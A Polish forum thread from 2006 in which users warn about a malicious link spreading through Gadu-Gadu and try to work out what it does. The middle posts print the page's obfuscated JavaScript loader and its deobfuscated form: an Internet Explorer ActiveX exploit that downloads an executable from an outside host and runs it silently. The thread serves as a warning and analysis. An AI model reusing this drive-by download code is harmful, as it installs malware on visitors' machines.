GoldenLine
Zaloguj się
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

Wielu z użytkowników komunikuje sie przy pomocy gadu-gadu. Wielu z nich często nie wie co ma na swoim komputerze i w ten oto sposób dochodzi do takich sytuacji jak dziś.

Jeśli dostaniecie od kogokolwiek wiadomosc o takiej tresci :

http://www.brico-ok.com/ja_woll.php

to NIE OTWIERAJCIE !! Osoba od ktorej to dostaliscie nawet nie wie ze cos takiego zostalo wyslane.

pozdrawiam,

Arvind


Arvind Juneja edytował(a) ten post dnia 29.10.06 o godzinie 14:29
Link do wypowiedziLink

konto usunięte

Temat: dla tych którzy używają GG. Warning.

a co tam jest?
Link do wypowiedziLink
Monika Budzyńska

Monika Budzyńska Freelance Tech
Recruiter

Temat: dla tych którzy używają GG. Warning.

oszz...właśnie co tam jest???
Link do wypowiedziLink

konto usunięte

Temat: dla tych którzy używają GG. Warning.

jak każdy pół-inteligent, użytkownik Windowsa, otworzyłem tę stronę, ale nic tam nie było :)
Link do wypowiedziLink
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

:/ no to prawdopodobnie wlasnie stales sie kolejnym zombiakiem...
w tej chwili staram sie "rozszyfrowac" javascripta ktory uruchomiles otwierajac ta strone.

/hehe tworc robaka chyba nie przewidzieli ze tak szybko bedzie dzialal i serwer pada co chwile :P


Arvind Juneja edytował(a) ten post dnia 29.10.06 o godzinie 14:34
Link do wypowiedziLink

konto usunięte

Temat: dla tych którzy używają GG. Warning.

myślisz, że ponowne uruchomienie komputera coś pomogło?
Link do wypowiedziLink
Monika Budzyńska

Monika Budzyńska Freelance Tech
Recruiter

Temat: dla tych którzy używają GG. Warning.

ja to odpaliłam na służbowym notebooku...też "nic nie było":) ale jak mniemam, coś wlazło.
Link do wypowiedziLink
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

ehm ja musze wyjsc z domu wiec tymczasowo sie za to nie wezme ale jak ktos zna JS to zapraszam do zabawy :

var NÚotUwcbW='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
function ylNQjyCnG(EMOpwBlDw)
{
var tBdBWMfUk='', BNVhoXkÚA, edQLRSsLw2, FquDSdeLi, qrFrvqeTÚ, VXWCoWUGl, bXpkBbvcW, jOAwRfyvk, phwfÚbvus=0;EMOpwBlDw=EMOpwBlDw.replace(/[^A-Za-z0-9\+\/\=]/g, '');
do {
qrFrvqeTÚ=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++)); VXWCoWUGl=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++)); bXpkBbvcW=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++)); jOAwRfyvk=NÚotUwcbW.indexOf(EMOpwBlDw.charAt(phwfÚbvus++));
BNVhoXkÚA=(qrFrvqeTÚ <> 4);
LwuWKtEKc=((VXWCoWUGl & 15) <> 2);
FquDSdeLi=((bXpkBbvcW & 3) << 6) | jOAwRfyvk;
tBdBWMfUk=tBdBWMfUk+String.fromCharCode(BNVhoXkÚA);
if (bXpkBbvcW!=64) tBdBWMfUk=tBdBWMfUk+String.fromCharCode(LwuWKtEKc);
if (jOAwRfyvk!=64) tBdBWMfUk=tBdBWMfUk+String.fromCharCode(FquDSdeLi);
}
while (phwfÚbvus eval(tBdBWMfUk);
}
Link do wypowiedziLink
Maria W.

Maria W. Fizjoterapeutka

Temat: dla tych którzy używają GG. Warning.

a jak ktos nie zna, to trzeba przyznac, ze ladne czary-mary... jak sie dowiecie co tam jest to dajcie znac spoleczenstwu
hokus-pokus, znikam!
Link do wypowiedziLink
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

no i ok, po przerobieniu tego syfu na nasze dostałem cały kod psuja

function Log(m) {
var log = document.createElement('p');
log.innerHTML = m;
}
function CreateO(o, n) {
var r = null;

try { eval('r = o.CreateObject(n)') }catch(e){}

if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}

if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);
} \
function Go(a) {
Log(' ');
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var e = s.Environment("Process");

Log(' ');
var url = "http://www.brico-ok.com/win32.exe";
var xml = null;
var bin = e.Item("TEMP") + "windns32.exe";
var dat;

try { xml=new XMLHttpRequest(); }
catch(e) {
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
}
}

if (! xml) return(0);
Log(' ');
xml.open("GET", url, false);
xml.send(null);
dat = xml.responseBody;
Log(' ');
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);
Log(' ');
s.Run(bin,0);
}
function Exploit() {
var i = 0;
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','
{BD96C556-65A3-11D0-983A-00C04FC29E36}','
{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','
{0006F033-0000-0000-C000-000000000046}','
{0006F03A-0000-0000-C000-000000000046}','
{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','
{6414512B-B978-451D-A0D8-FCFDF33E833C}','
{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','
{06723E09-F4C2-43c8-8358-09FCD1DB0766}','
{639F725F-1B2D-4831-A9FD-874847682010}','
{BA018599-1DB3-44f9-83B4-461454C84BF8}','
{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','
{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (t[i]) {
var a = null;

if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}
if (a) {
try {
var b = CreateO(a, "WScript.Shell");
if (b) {
Log(' ');
Go(a);
return(0);
}
} catch(e){}
}
i++;
}
Log(' ');
}

Exploit();


co za tym idzie prostymi slowami sciaga nam sie syf na dysk (nazwy z .exe w kodzie) i trzeba go usunac :) win32.exe windns32.exe .


Arvind Juneja edytował(a) ten post dnia 29.10.06 o godzinie 17:18
Link do wypowiedziLink

konto usunięte

Temat: dla tych którzy używają GG. Warning.

podstawowa zasada ograniczonego zaufania na drodze - to juz kazda zna - teraz czas nauczyc sie tego w odniesieniu do komputerow :)
Link do wypowiedziLink
Marcin Bacia

Marcin Bacia ...-BraveMind-...

Temat: dla tych którzy używają GG. Warning.

odnośnie gg zobacznie też tu http://gadawski.pl/gg
Link do wypowiedziLink
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

tya...

w kazdym razie co trzeba zrobic ? Jeszcze nie zanalizowalem calsoci ale poki co standardowo sprawdzamy procesy w systemie (ctrl+alt+del , zakladma procesy) czy nie ma tam czegos nie chcianego no i killem :P

poki co jeszcze zerkam co mozna z tym zrobic.
Link do wypowiedziLink
Agnieszka S.

Agnieszka S. W pracy inspektor, z
zamiłowania
fotografik

Temat: dla tych którzy używają GG. Warning.

Arvind,

Czy po nazwach procesów jesteś w stanie rozpoznać te niechciane?
Ja mam ich dosyć dużo w aktywnych procesach. Kiedyś je już przeglądaliśmy z Krzyśkiem. Na niektóre nie działa zwykły kill, bo zapisują są w jakimś katalogu procesów do uruchomienia każdorazowo po włączeniu PC.
Link do wypowiedziLink
Monika Budzyńska

Monika Budzyńska Freelance Tech
Recruiter

Temat: dla tych którzy używają GG. Warning.

hm...sprawdziłam, u mnie tego nie ma - nie rozumiem ale mniejsza z tym :-)
Link do wypowiedziLink
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

jak sie cos odpala automatycznie to
start - > uruchom -> msconfig [ENTER]

i tam szukasz co Ci sie nie podoba i odklikujesz po reboocie sie nie odpali, druga rzecz autostart w rejestrze ( start - > uruchom - > regedit )

co do tego syfu z gg to sie chyba podpina w cos systemowego wlasnie :/ ale jeszcze nie wiem co..
Link do wypowiedziLink
Tomasz Muchajer

Tomasz Muchajer Kierownik Działu
Portali i Sprzedaży
Internetowej,
Polkom...

Temat: dla tych którzy używają GG. Warning.

Co konkretnie masz na myśli pod pojęciem "coś odpala automatycznie" ?
Masz na mysli to, że GG wywołuje uruchomienia innej aplikacji ?

Ja używam Mirandy więc pewnie mnie to nie dotyczy, ale mam pod Mirandę podpięte również protokoły GG.
Link do wypowiedziLink
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

Agnieszka wspomniala o procesach ktore uruchamiają się ze startem systemu i to miałem na myśli mówiąc "coś odpala automatycznie".

To jakiego komunikatora uzywamy nie ma zbytnio znaczenia bo to strona uruchamiała ten syfek...

na tę chwilę (ja sie na RE za bardzo nie znam) wiem tyle że program jest upakowany (packer) i bez debbugowania nic nie sprawdze (z debugowaniem i moją wiedzą a raczej jej brakiem zapewne tez bym nie wiele zdzialal :P) takze na tym sie konczy chyba zabawa z tym czyms...
Link do wypowiedziLink

konto usunięte

Temat: dla tych którzy używają GG. Warning.

U niektórych jest, u niektórych nie. Skrypt wykorzystuje dziurę w zabezpieczeniach Internet Explorera, którego niektórzy użwają, a niektórzy nie - i oni nie są zagrożeni (tak jak użytkownicy innych, nielegalnych według regulaminu GG klientów).

Wszystko na ten temat (włacznie z filmem prezentującym działanie) tutaj: http://ktos.jogger.pl/2006/10/28/ancuszkowy-atak-na-gg/
Link do wypowiedziLink
Arvind Juneja

Arvind Juneja Współtwórca @
Fangol.pl | Blogger
@ Fitback.pl

Temat: dla tych którzy używają GG. Warning.

Jakub K.:U niektórych jest, u niektórych nie. Skrypt wykorzystuje dziurę w zabezpieczeniach Internet Explorera, którego niektórzy użwają, a niektórzy nie - i oni nie są zagrożeni (tak jak użytkownicy innych, nielegalnych według regulaminu GG klientów).

Wszystko na ten temat (włacznie z filmem prezentującym działanie) tutaj: http://ktos.jogger.pl/2006/10/28/ancuszkowy-atak-na-gg/

klient nie ma tu za bardzo znaczenia bo przeciez link jest "uruchamiany" przez przeglądarkę prawda ? ale dzięki za linka chętnie obejrzę :)
Link do wypowiedziLink
« Wróć do tematów
Odpowiedz

Podobne tematy





Wyślij zaproszenie do
Anuluj